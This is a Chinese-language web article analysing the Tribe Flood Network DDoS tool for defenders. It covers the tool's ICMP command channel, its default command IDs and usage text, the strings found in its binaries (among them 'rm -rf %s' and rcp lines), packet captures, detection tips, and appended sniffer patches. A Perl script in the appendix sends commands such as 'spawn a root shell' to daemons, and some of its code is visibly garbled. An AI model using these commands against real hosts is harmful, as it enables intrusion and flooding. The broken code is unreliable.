网络通信 频道
IT168首页 > 网络通信 > 网络通信应用 > 正文

DDoS 攻击工具分析 Tribe Flood Network

作者:netsp 编辑: 王炯 2007-07-01 00:00
分享

简 介
  --------
  
   本文是对德国著名黑客Mixter编写的分布式拒绝服务攻击工具——"Tribe Flood Network(TFN)"的技术性分析。TFN与另一个分布式拒绝服务攻击工具"Trinoo"相似,都在互联网的大量Unix系统中开发和测试。
  
   TFN由客户端程序和守护程序组成。通过提供绑定到TCP端口的root shell控制,实施ICMP flood、SYN flood、UDP flood和Smurf等多种拒绝服务的分布式网络攻击。
  
   TFN守护程序的二进制代码包最初是在一些Solaris 2.x主机中发现的,这些主机是被攻击者利用RPC服务安全漏洞"statd"、"cmsd"和"ttdbserverd"入侵的。关于这些漏洞的详细资料请参阅CERT事件记录99-04:
  
   http://www.cert.org/incident_notes/IN-99-04.html
  
   最初的TFN守护程序来源于一些远程嗅探器(sniffer)和有访问控制的远程命令shell,并可能结合了能自动记录的嗅探器(sniffer)。
  
   在研究这个工具包的过程中,捕获到了TFN攻击网络的安装过程及一些源代码。我们就是利用这些捕获到的源代码(根据Makefile,版本为"version 1.3 build 0053")和已编译的TFN守护程序二进制代码进入了深入的分析。
  
   对这些源代码的任何修改,如提示、口令、命令、TCP/UDP端口号或所支持的攻击方法、签名和具体功能,都可能使分析的结果与本文不同。
  
   该守护程序是在Solaris 2.x和Red Hat Linux 6.0上编译并运行。主服务器 (master) 在Red Hat Linux 6.0上编译和运行。但也许守护程序和主服务器都可在其它同类平台中使用。
  
   关于这种分布式拒绝服务攻击网络的初始入侵和安装配置过程的分析,请参阅对Trinoo工具的分析。
  
  攻击目标
  ------------------------------------------------------------
  
  TFN网络由TFN客户端程序("tribe.c")和TFN守护程序("td.c")组成。一个典型的TFN网络结构如下:
  
  
   +----------+ +----------+
   | 攻击者 | | 攻击者 |
   +----------+ +----------+
   | |
   . . . --+------+---------------+------+----------------+-- . . .
   | | |
   | | |
   +----------+ +----------+ +----------+
   | 客户端 | | 客户端 | | 客户端 |
   +----------+ +----------+ +----------+
   | | |
   | | |
  . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
   | | | | |
   | | | | |
   +--------+ +--------+ +--------+ +--------+ +--------+
   |守护程序| |守护程序| |守护程序| |守护程序| |守护程序|
   +--------+ +--------+ +--------+ +--------+ +--------+
  
  
  
   攻击者常常控制一个或多个TFN客户端,而每一个TFN客户端能控制多个TFN"守护程序"。所有接收到来自TFN客户端攻击指令的TFN守护程序都使用攻击数据包同时攻击一个或多个目标主机系统。
  
  
  
  通 讯
  --------
  
   TFN网络的远程控制通过TFN客户端程序命令行的执行来实现。命令的执行可通过多种连接方法完成(如:绑定到TCP端口的远程shell,基于UDP的客户/服务器远程shell,基于ICMP的客户/服务器远程shell,SSH终端会话,或普通的"telnet"TCP终端会话等)。
  
  TFN客户端程序的运行无需口令,但需要有TFN守护程序端的IP列表文件"iplist"。
  
   从TFN客户端到TFN守护程序端的通讯通过ICMP_ECHOREPLY数据包完成,这样在TFN客户端和TFN守护程序端就根本不会有任何基于TCP或UDP的通讯。(许多网络监视工具不能显示ICMP包的数据部份,或不解析ICMP类型字段,因此很难准确监视到TFN客户端与守护程序端的通讯。请参阅附录A提供的能显示ICMP数据段内容的Sniffit version 0.3.7.beta补丁程序,和附录B提供的能显示ICMP_ECHO和ICMP_ECHOREPLY id和序列号的tcpshow.c 1.0补丁程序。)
  
  不指定任何参数或选项运行该程序,会显示该TFN程序相关命令的帮助信息:
  
  ---------------------------------------------------------------------------
   [tribe flood network] (c) 1999 by Mixter
  
  usage: ./tfn [ip] [port]
   contains a list of numerical hosts that are ready to flood
   -1 for spoofmask type (specify 0-3), -2 for packet size,
   is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
   4 to bind a rootshell (specify port)
   5 to smurf, first ip is target, further ips are broadcasts
  [ip] target ip[s], separated by @ if more than one
  [port] must be given for a syn flood, 0 = RANDOM
  ---------------------------------------------------------------------------
  
  
  
  口 令 保 护
  -----------
  
   虽然TFN客户端无需任何口令保护,但每一个发送到TFN守护程序端的命令都是一个含有16位二进制id值的ICMP_ECHOREPLY包。(序列号总是为0x0000,这样能使其看上去象对"ping"命令发送的初始包的回应包。)
  
  这个id的所有取值在"config.h"文件中定义:
  
  ---------------------------------------------------------------------------
  #ifndef _CONFIG_H
  
  /* user defined values for the teletubby flood network */
  
  #define HIDEME "tfn-daemon"
  #define HIDEKIDS "tfn-child"
  #define CHLD_MAX 50
  
  /* #define ATTACKLOG "attack.log" keep a log of attacks/victims on all
   hosts running td for debugging etc. (hint: bad idea) */
  
  /* These are like passwords, you might want to change them */
  
  #define ID_ACK 123 /* for replies to the client */
  #define ID_SHELL 456 /* to bind a rootshell, optional */
  #define ID_PSIZE 789 /* to change size of udp/icmp packets */
  #define ID_SWITCH 234 /* to switch spoofing mode */
  #define ID_STOPIT 567 /* to stop flooding */
  #define ID_SENDUDP 890 /* to udp flood */
  #define ID_SENDSYN 345 /* to syn flood */
  #define ID_SYNPORT 678 /* to set port */
  #define ID_ICMP 901 /* to icmp flood */
  #define ID_SMURF 666 /* haps! haps! */
  
  #define _CONFIG_H
  #endif
  ---------------------------------------------------------------------------
  
  正如我们看到的,这些值都能够被改变,以避免TFN守护程序被其他攻击者利用。
  
  
  
  工 具 特 征
  -----------
  
   和Trinoo类似,安装TFN客户端程序/守护程序与在Unix系统中安装其它程序一样,同时还具备所有能隐藏程序和文件的标准安装选项。
  
   TFN的客户端程序和守护程序都必须以root权限运行,因为它们都需要以SOCK_RAW方式打开AF_INET套接字(socket)。
  
   由于TFN客户端程序需要可用的iplist文件,因此只要找到TFN客户端就能得到其TFN守护程序端的机器清单。目前的TFN守护程序安装时都包含了对iplist文件进行Blowfish加密,这样使得确定TFN守护程序端机器更加困难了。
  
  在最近发现的TFN守护程序二进制代码中找到的字符串有(已经过整理):
  
  字符串
  --------------------------------
  blowfish_init
  blowfish_encipher
  blowfish_decipher
  encrypt_string
  decrypt_string
  
  serverworks
  readmservers
  addnewmserver
  delmserver
  servcounti
  
  icmp2
  udppsize
  icmpsize
  spoofing
  spooftest
  commence_icmp
  commence_udp
  commence_syn
  floodtime
  floodruns
  
  bind
  setsockopt
  listensocket
  
  k00lip
  fw00ding
  k00lntoa
  tc: unknown host
  rm -rf %s
  ttymon
  rcp %s@%s:sol.bin %s
  nohup ./%s
  130.243.70.20
  127.0.0.1
  lpsched
  sicken
  in.telne
  --------------------------------
  
  如果使用"lsof"命令检查运行的守护程序进程,会显示可疑的socket:
  
  ------------------------------------------------------------------------------
  td 5931 root cwd DIR 3,5 1024 240721 /usr/lib/libx/...
  td 5931 root rtd DIR 3,1 1024 2 /
  td 5931 root txt REG 3,5 297508 240734 /usr/lib/libx/.../td
  td 5931 root 3u sock 0,0 92814
  ------------------------------------------------------------------------------
  
  如果启动了远程shell,TFN守护程序会产生监听某个TCP端口的子进程:
  
  ------------------------------------------------------------------------------
  td 5970 root cwd DIR 3,5 1024 240721 /usr/lib/libx/...
  td 5970 root rtd DIR 3,1 1024 2 /
  td 5970 root txt REG 3,5 297508 240734 /usr/lib/libx/.../td
  ……
  td 5970 root 0u inet 92909 TCP
  *:12345 (LISTEN)
  td 5970 root 3u sock 0,0 92814
  ------------------------------------------------------------------------------
  
  使用经过(附录A)修改"sniffit"监听网络通讯,并运行"ping -c 3 10.0.0.1":
  
  ---------------------------------------------------------------------------
  # sniffit -d -a -x -b -s @ -Picmp
  Supported Network device found. (eth0)
  Sniffit.0.3.7 Beta is up and running.... (192.168.0.1)
  10.0.0.1
   ICMP type: Echo request
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 08 . 00 . 2B + 51 Q 98 . 04 . 00 . 00 . 37 7 FC . 0D . 38 8
  02 . 73 s 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  192.168.0.1
   ICMP type: Echo reply
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 00 . 00 . 33 3 51 Q 98 . 04 . 00 . 00 . 37 7 FC . 0D . 38 8
  02 . 73 s 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  10.0.0.1
   ICMP type: Echo request
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 08 . 00 . 58 X 61 a 98 . 04 . 01 . 00 . 38 8 FC . 0D . 38 8
  D3 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  192.168.0.1
   ICMP type: Echo reply
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 00 . 00 . 60 ` 61 a 98 . 04 . 01 . 00 . 38 8 FC . 0D . 38 8
  D3 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  10.0.0.1
   ICMP type: Echo request
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 08 . 00 . 70 p 61 a 98 . 04 . 02 . 00 . 39 9 FC . 0D . 38 8
  B9 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  192.168.0.1
   ICMP type: Echo reply
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 00 . 00 . 78 x 61 a 98 . 04 . 02 . 00 . 39 9 FC . 0D . 38 8
  B9 . 62 b 02 . 00 . 08 . 09 . 0A . 0B . 0C . 0D . 0E . 0F . 10 . 11 . 12 . 13 .
  14 . 15 . 16 . 17 . 18 . 19 . 1A . 1B . 1C . 1D . 1E . 1F . 20 21 ! 22 " 23 #
  24 $ 25 % 26 & 27 '' 28 ( 29 ) 2A * 2B + 2C , 2D - 2E . 2F / 30 0 31 1 32 2 33 3
  34 4 35 5 36 6 37 7
  ----------------------------------------------------------------------------
  
  以上是正常通讯的ICMP包,可以看到第一个包的序列号是0,然后按顺序依次递增。
  
  使用经过(附录B)修改的tcpdump/tcpshow程序监听时,这三对正常的ICMP包为:
  
  ----------------------------------------------------------------------------
  # tcpdump -lenx -s 1518 icmp | tcpshow -noip -nolink -cooked
  tcpdump: listening on eth0
  Packet 1
  ICMP Header
   Type: echo-request
   Checksum: 0x9B2A
   Id: 0x6E03
   Sequence: 0x0000
  ICMP Data
   q..8x.
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  Packet 2
  ICMP Header
   Type: echo-reply
   Checksum: 0xA32A
   Id: 0x6E03
   Sequence: 0x0000
  ICMP Data
   q..8x.
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  Packet 3
  ICMP Header
   Type: echo-request
   Checksum: 0x623A
   Id: 0x6E03
   Sequence: 0x0001
  ICMP Data
   r..8..
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  Packet 4
  ICMP Header
   Type: echo-reply
   Checksum: 0x6A3A
   Id: 0x6E03
   Sequence: 0x0001
  ICMP Data
   r..8..
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  Packet 5
  ICMP Header
   Type: echo-request
   Checksum: 0x5A3A
   Id: 0x6E03
   Sequence: 0x0002
  ICMP Data
   s..8..
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  Packet 6
  ICMP Header
   Type: echo-reply
   Checksum: 0x623A
   Id: 0x6E03
   Sequence: 0x0002
  ICMP Data
   s..8..
   ..
   ..................... !"#$%&''()*+,-./01234567
  -----------------------------------------------------------------
  
   TFN客户端通过ICMP_ECHOREPLY包而不是ICMP_ECHO包向TFN守护程序发送命令。这能够防止守护程序所在系统的内核发送ICMP_ECHOREPLY包。而TFN守护程序则在需要时也通过ICMP_ECHOREPLY包响应TFN客户端。TFN使用的ICMP包与正常ICMP包的不同之处在于它发送的命令参数及响应。
  
   在TFN使用的ICMP_ECHOREPLY包的id域中包含了"命令"(16位二进制值),而在数据段中则是ASCII明文方式的任何参数。
  
  以下是某个攻击者执行命令以启动在端口12345上监听的shell:
  
  ----------------------------------------------------------------------------
  # ./tfn iplist 4 12345
   [tribe flood network] (c) 1999 by Mixter
  
  [request: bind shell to port 12345]
  192.168.0.1: shell bound to port 12345
  #
  ----------------------------------------------------------------------------
  
  以下是使用"sniffit"监听到的网络通讯:
  
  ---------------------------------------------------------------------------- 192.168.0.1
   ICMP type: Echo reply
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 00 . 00 . 64 d D1 . 01 . C8 . 00 . 00 . 31 1 32 2 33 3 34 4
  35 5 00 .
  10.0.0.1
   ICMP type: Echo reply
  .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
  .. . .. . .. . .. . 00 . 00 . 6C l AE . 00 . 7B { 00 . 00 . 73 s 68 h 65 e 6C l
  6C l 20 62 b 6F o 75 u 6E n 64 d 20 74 t 6F o 20 70 p 6F o 72 r 74 t 20
  31 1 32 2 33 3 34 4 35 5 0A . 00 .
  ----------------------------------------------------------------------------
  
  以下是使用"tcpdump"监听到的网络通讯:
  
  ----------------------------------------------------------------------------
  # tcpdump -lnx -s 1518 icmp
  tcpdump: listening on eth0 192.168.0.1: icmp: echo reply
   .... .... .... .... .... .... .... ....
   .... .... 0000 64d1 01c8 0000 3132 3334
   3500 10.0.0.1: icmp: echo reply
   .... .... .... .... .... .... .... ....
   .... .... 0000 6cae 007b 0000 7368 656c
   6c20 626f 756e 6420 746f 2070 6f72 7420
   3132 3334 350a 00
  ----------------------------------------------------------------------------
  
  以下是"tcpdump"和"tcpshow"结合所监听到的内容:
  
  ----------------------------------------------------------------------------
  Packet 1
  ICMP Header
   Type: echo-reply
   Checksum: 0x64D1
   Id: 0x01C8
   Sequence: 0x0000
  ICMP Data
   12345
  -----------------------------------------------------------------
  Packet 2
  ICMP Header
   Type: echo-reply
   Checksum: 0x6CAE
   Id: 0x007B
   Sequence: 0x0000
  ICMP Data
   shell bound to port 12345
  ----------------------------------------------------------------------------
  
   能够看到,TFN客户端利用id字段包含命令0x01C8,序列号为0x0000(总是为0),还包含了指定的端口号为"12345",都发送到TFN守护程序端。
  
   TFN守护程序回送给TFN客户端的内容包括id字段中的响应命令(0x007B),序列号为0x0000,和字符串"shell bound to port 12345\n"。这个字符串将和TFN守护程序的IP地址一起显示到TFN客户端的shell中。
  
  
  
  防 御
  --------
  
   因为这个工具利用ICMP_ECHOREPLY包进行通讯,除非修改使用ICMP协议的程序,否则很难(但不是不可能)阻止它。Phrack的建议是:
  
   最可靠的方法是禁止所有进入网络的ICMP_ECHO和ICMP_ECHOREPLY通讯。
  
   简单地说,分辨ICMP_ECHO和ICMP_ECHOREPLY包是否正常不是一件容易的事情,特别对于大型网络。
  
  
  
  缺陷及弱点
  ----------
  
  如果源代码未必修改,可以通过搜索程序二进制代码中的字符串查找TFN客户端程序和TFN守护程序:
  
  ------------------------------------------------------------------------------
  # strings - td
  . . .
  %d.%d.%d.%d
  /bin/sh
  tfn-daemon
  already %s flooding
  multiple targets
  ICMP flood: %s
  tfn-child
  SMURF (target@bcast@...): %s
  UDP flood: %s
  SYN flood: port %d, multiple targets
  SYN flood: port %d, %s
  ready - size: %d spoof: %d
  %s flood terminated
  packet size: %d bytes
  spoof mask: *.*.*.* (%s)
  spoof mask: 1.*.*.* (%s)
  spoof mask: 1.1.*.* (%s)
  spoof mask: 1.1.1.* (%s)
  spoof test: %s
  shell bound to port %s
  . . .
  [0;35m[tribe flood network]
  (c) 1999 by
  [5mMixter
  ICMP
  SMURF
  . . .
  
  # strings - tfn
  . . .
  %d.%d.%d.%d
  ERROR reading IP list
  [1;37m
  [request: change packet size]
  [request: change spoofmask]
  [request: stop and display status]
  [request: udp flood %s]
  [request: syn flood [port: %s] %s]
  [request: icmp flood %s]
  [request: bind shell to port %s]
  [request: smurf (target@bcast@...) %s]
  [0;0m
  [0m%s:
  [0;31m
  [0;34mtimeout
  [1;34m
  usage: %s [ip] [port]
   contains a list of numerical hosts that are ready to flood
   -1 for spoofmask type (specify 0-3), -2 for packet size,
   is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
   4 to bind a rootshell (specify port)
   5 to smurf, first ip is target, further ips are broadcasts
  [ip] target ip[s], separated by %s if more than one
  [port] must be given for a syn flood, 0 = RANDOM
  skipping
  [0;35m[tribe flood network]
  (c) 1999 by
  [5mMixter
  . . .
  ------------------------------------------------------------------------------
  
   最近发现的二进制代码中的字符串表明,多TFN客户端支持(类似Trinoo)、iplist文件加密、ICMP包数据段内容加密等新功能正在或已经加入到该工具中。
  
   最近发现的二进制代码有些使用了"rcp"命令,这样监视"rcp"连接(514/tcp)也许能够较快地发现问题。
  
   由于TFN使用ICMP数据包,很难实时监测出通讯,而且这些数据包往往能直接通过大多数防火墙。象"ngrep"这类程序也不能处理ICMP数据包,所以目前也很难监视ICMP包中的数据段内容。
  
   TFN的一个缺陷是目前为止还没有对ICMP包的源地址进行验证。这样如果命令对应的缺省数值未被改变,只需一个数据包就能探测出一个TFN守护程序。(请参阅附录C中的Perl脚本。)
  
   如果命令对应的各个数据改变了,通过暴力法(发送所有可能的数值组合)仍然有可能使TFN守护程序关闭(id字段是16位,共有64K种组合)。与此同时,对TFN守护程序端机器进行ICMP flood攻击来使其失效,也是一种潜在的可行方法。
  
  
  
  附录A:sniffit v0.3.7.beta显示ICMP包数据内容的补丁程序
  -----------------------------------------------------------------
  
  --------------------------- cut here -------------------------------
  diff -c sniffit.0.3.7.beta.orig/sn_defines.h sniffit.0.3.7.beta/sn_defines.h
  *** sniffit.0.3.7.beta.orig/sn_defines.h Wed Aug 26 12:21:23 1998
  --- sniffit.0.3.7.beta/sn_defines.h Wed Oct 20 10:15:41 1999
  ***************
  *** 126,132 ****
   #define ICMP_TYPE_3 "Destination unreachable"
   #define ICMP_TYPE_4 "Source quench"
   #define ICMP_TYPE_5 "Redirect"
  ! #define ICMP_TYPE_8 "Echo"
   #define ICMP_TYPE_11 "Time exceeded"
   #define ICMP_TYPE_12 "Parameter problem"
   #define ICMP_TYPE_13 "Timestamp"
  --- 126,132 ----
   #define ICMP_TYPE_3 "Destination unreachable"
   #define ICMP_TYPE_4 "Source quench"
   #define ICMP_TYPE_5 "Redirect"
  ! #define ICMP_TYPE_8 "Echo request"
   #define ICMP_TYPE_11 "Time exceeded"
   #define ICMP_TYPE_12 "Parameter problem"
   #define ICMP_TYPE_13 "Timestamp"
  ***************
  *** 134,140 ****
   #define ICMP_TYPE_15 "Information request"
   #define ICMP_TYPE_16 "Information reply"
   #define ICMP_TYPE_17 "Address mask request"
  ! #define ICMP_TYPE_18 "Adress mask reply"
  
   /*** Services (standardised) *******************************************/
   #define FTP_DATA_1 20
  --- 134,140 ----
   #define ICMP_TYPE_15 "Information request"
   #define ICMP_TYPE_16 "Information reply"
   #define ICMP_TYPE_17 "Address mask request"
  ! #define ICMP_TYPE_18 "Address mask reply"
  
   /*** Services (standardised) *******************************************/
   #define FTP_DATA_1 20
  diff -c sniffit.0.3.7.beta.orig/sniffit.0.3.7.c sniffit.0.3.7.beta/sniffit.0.3.7.c
  *** sniffit.0.3.7.beta.orig/sniffit.0.3.7.c Wed Aug 26 12:21:25 1998
  --- sniffit.0.3.7.beta/sniffit.0.3.7.c Wed Oct 20 10:15:49 1999
  ***************
  *** 1333,1339 ****
   printf ("Unknown ICMP type!\n");
   break;
   }
  ! printf ("\n");
   return;
   }
   if (finish < 30) /* nothing yet */
  --- 1333,1351 ----
   printf ("Unknown ICMP type!\n");
   break;
   }
  ! total_length = info.IP_len + info.ICMP_len + info.DATA_len;
  ! n = 0;
  ! for (i = 0; i < total_length; i++)
  ! {
  ! unsigned char c = sp[PROTO_HEAD + i]; 75)
  ! n = 0, printf ("\n");
  ! if (DUMPMODE & 1)
  ! n += printf (" %02X", c);
  ! if (DUMPMODE & 2)
  ! n += printf (" %c", isprint (c) ? c : ''.'');
  ! }
  ! printf ("\n\n");
   return;
   }
   if (finish < 30) /* nothing yet */
  --------------------------- cut here -------------------------------
  
  
  
  附录B:tcpshow 1.0显示ICMP ECHO包id/序列号的补丁程序
  ----------------------------------------------------------------------
  
  --------------------------- cut here -------------------------------
  diff -c tcpshow.c.orig tcpshow.c
  *** tcpshow.c.orig Thu Oct 21 14:12:19 1999
  --- tcpshow.c Thu Oct 21 14:22:34 1999
  ***************
  *** 1081,1086 ****
  --- 1081,1088 ----
   uint2 nskipped;
   uint1 type;
   char *why;
  + uint2 echo_id;
  + uint2 echo_seq;
  
  
   type = getbyte(&pkt); nskipped = sizeof(type);
  ***************
  *** 1091,1096 ****
  --- 1093,1103 ----
   /* Must calculate it from the size of the IP datagram - the IP header. */
   datalen -= ICMPHDRLEN;
  
  + if (type == ECHO_REQ || type == ECHO_REPLY) {
  + echo_id = getword(&pkt); nskipped += sizeof(cksum);
  + echo_seq = getword(&pkt); nskipped += sizeof(cksum);
  + }
  +
   why = icmpcode(type, code);
   if (dataflag) {
   printf(
  ***************
  *** 1113,1118 ****
  --- 1120,1129 ----
   icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: ""
   );
   printf("\tChecksum:\t\t\t0x%04X\n", cksum);
  + if (type == ECHO_REQ || type == ECHO_REPLY) {
  + printf("\tId:\t\t\t\t0x%04X\n", echo_id);
  + printf("\tSequence:\t\t\t0x%04X\n", ntohs(echo_seq));
  + }
   }
  
   return pkt;
  --------------------------- cut here -------------------------------
  
  
  
  附录C:关闭TFN守护程序的Perl脚本"civilize"
  ----------------------------------------------------------
  
  --------------------------- cut here -------------------------------
  #!/usr/bin/perl
  #
  # civilize v. 1.0
  # By Dave Dittrich
  #
  # Send commands to TFN daemon(s), causing them to do things like
  # spawn shells, stop floods and report status, etc. Using this program
  # (and knowledge of the proper daemon "passwords"), you can affect TFN
  # daemons externally and monitor packets to verify if a daemon is
  # running, etc. You can also brute force attack the "passwords" by
  # sending packets until you get the desired reply (or give up.)
  #
  # Needs Net::RawIP (http://quake.skif.net/RawIP)
  # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
  #
  # Example: ./civilize [options] host1 [host2 [...]]
  #
  # (This code was hacked from the "macof" program, written by
  # Ian Vitek )
  
  require ''getopts.pl'';
  use Net::RawIP;
  require ''netinet/in.ph'';
  {}});
  chop($hostname = `hostname`);
  
  Getopts(''a:c:f:i:vh'');
  die "usage: $0 [options] iplist\t-a arg\t\tSend command argument ''arg'' (default \"12345\")\t-c val\t\tSend command value ''val'' (default 456 - spawn a shell)\t-f from_host\t\t(default:$hostname)\t-i interface \t\tSet sending interface (default:eth0)\t-v\t\t\tVerbose\t-h This help\n" unless ( !$opt_h );
  
  # set default values
  $opt_i = ($opt_i) ? $opt_i : "eth0";
  $opt_a = ($opt_a) ? $opt_a : "12345";
  $opt_c = ($opt_c) ? $opt_c : "456";
  
  # choose network card
  if($opt_e) { $opt_e);
  } else {ethnew($opt_i);
  }
  
  $s_host = ($opt_h) ? $opt_h : $hostname;
  
  if ($ARGV[0]) {
   open(I,"<$ARGV[0]") || die "could not open file: ''$ARGV[0]''";
   while () {
   chop;
   push(@list,$_);
   }
   close(I);
  }
  
  # Put value in network byte order (couldn''t get htons() in
  # "netinet/in.ph" to work. Go figure.)
  $id = unpack("S", pack("n", $opt_c));
  
  foreach $d_host (@list) { $d_host}, "$opt_a\0"}
   });
   print "sending packet [$opt_c/$opt_a] to $d_host\n" if $opt_v;send;
  }
  
  exit(0);

 

转载地址:http://www.netsp.com.cn/Article/netsafe/attack/200506/20050602135036.html

0
相关文章
    盛拓传媒简介 关于IT168 广告服务 使用条款 投稿指南 联系我们
    北京盛拓优讯信息技术有限公司. 版权所有 中华人民共和国增值电信业务经营许可证 编号:京B2-20170206 北京市公安局海淀分局网监中心备案编号:11010802020118
    广播电视节目制作经营许可证:(京) 字第25315号 信息系统安全等级保护备案:11010813655-00001 京公网安备11010802020118号
    违法和不良信息举报电话 :010-58859066,18101376593,shengtuo20@it168.com